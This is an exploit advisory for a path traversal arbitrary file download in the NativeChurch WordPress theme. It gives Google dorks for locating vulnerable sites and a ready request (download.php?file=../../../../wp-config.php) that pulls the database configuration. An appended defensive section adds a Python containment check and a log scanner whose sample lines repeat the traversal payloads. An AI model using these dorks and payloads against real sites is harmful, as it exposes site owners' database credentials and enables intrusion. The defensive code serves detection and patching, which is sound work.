####################################################################
# Exploit Title : WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/02/2019
# Vendor Homepage : themeforest.net
# Software Information Link : themeforest.net/item/nativechurch-multi-purpose-wordpress-theme/7082446
# Software Affected Versions : WordPress From 3.9 to 5.0.x - Compatible with Bootstrap 3.x - bbPress 2.5.x - From WooCommerce 2.1.x To WooCommerce 3.4.x
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : [PDF]Sample PDF File inurl:"/wp-content/themes/NativeChurch/"
#                inurl:"/wp-content/themes/NativeChurch/download/"
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
#                      CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description about Software :
***************************
NativeChurch is a powerful WordPress Theme designed & developed for Church, Charity, Non-Profit and Religious Websites and comes handy for Portfolio/Corporate Websites as well.
####################################################################
# Impact :
***********
* The NativeChurch theme for WordPress is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks. Attackers can use a browser to exploit this issue.
* The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.
####################################################################
# Arbitrary File Download Exploit :
******************************
/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
# Example Information about the MySQL WordPress Configuration File :
***********************************************************
/** WordPress database name. */
define('DB_NAME',
/** MySQL database user. */
define('DB_USER',
/** MySQL database password. */
define('DB_PASSWORD',
/** MySQL host address. */
define('DB_HOST',
###################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################
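As an added defensive example (not from the advisory or the theme's own code): the containment check a download handler should perform before serving a file, and a scan over access-log lines for traversal attempts against the download endpoint named above. The download directory, its sample file and the log lines are constructed fixtures.

```python
import os
import re
import tempfile
from urllib.parse import unquote

def safe_download_path(base_dir, requested):
    # Resolve a user-supplied file name against base_dir; return the absolute
    # path only if it stays inside base_dir, otherwise None (CWE-23 fix).
    # Decode twice so %2e%2e%2f and double-encoded %252e variants are seen.
    candidate = unquote(unquote(requested or ""))
    if not candidate or "\x00" in candidate:
        return None
    base = os.path.realpath(base_dir)
    # realpath collapses ".." and follows symlinks before the containment check
    target = os.path.realpath(os.path.join(base, candidate))
    if not target.startswith(base + os.sep) or not os.path.isfile(target):
        return None
    return target

def make_demo_download_dir():
    # Constructed fixture: a download directory holding one sample file
    d = tempfile.mkdtemp(prefix="nativechurch_download_")
    with open(os.path.join(d, "sample.pdf"), "wb") as f:
        f.write(b"%PDF-1.4 constructed sample\n")
    return d

# Constructed access-log lines in Apache combined format (not from any real site)
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Feb/2019:10:00:01 +0000] "GET /wp-content/themes/NativeChurch/download/download.php?file=sample.pdf HTTP/1.1" 200 5120',
    '203.0.113.7 - - [26/Feb/2019:10:00:05 +0000] "GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php HTTP/1.1" 200 3100',
    '203.0.113.9 - - [26/Feb/2019:10:00:09 +0000] "GET /wp-content/themes/NativeChurch/download/download.php?file=%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 3100',
    '198.51.100.2 - - [26/Feb/2019:10:00:12 +0000] "GET /index.php HTTP/1.1" 200 9000',
]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
ENDPOINT = "/themes/NativeChurch/download/download.php"

def find_traversal_attempts(log_lines):
    # Return request paths that hit the theme's download endpoint with a
    # traversal sequence in the query, after URL-decoding (twice) as above.
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        decoded = unquote(unquote(m.group(1))).replace("\\", "/")
        if ENDPOINT in decoded and "../" in decoded:
            hits.append(m.group(1))
    return hits
```

The same containment logic applies in PHP via realpath() on both the base directory and the joined path; a 200 response to a traversal request in the log means the file was served and the credentials in wp-config.php should be treated as exposed.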